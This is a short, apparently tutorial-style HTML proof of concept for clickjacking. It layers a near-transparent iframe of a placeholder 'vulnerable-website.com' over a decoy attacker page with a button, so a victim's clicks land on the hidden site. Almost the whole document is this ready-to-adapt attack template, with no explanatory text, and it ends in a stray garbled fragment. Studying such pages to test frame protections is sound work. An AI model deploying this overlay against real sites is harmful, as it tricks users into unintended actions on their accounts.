<html>
    <head>
        <style>
             #vulnarble_website {
                position:relative;
                width:1920px;
                height:720px;
                top: 15px;
                left: -15px;
                opacity:0.2;
                z-index:2;
                padding-left:10px
                }
            #attacker_website {
                position:absolute;
                z-index:1;
                }
            #attacker_website button {
                margin-left: 45px;
                margin-top: 30;
                }
        </style>
    </head>
    ...
    <body>
        <div id="attacker_website">
        ...decoy web content here...
        </div>
        <iframe id="vulnarble_website" src="https://vulnerable-website.com">
        </iframe>
    </body>
</html>


*/*  crafted here: */*

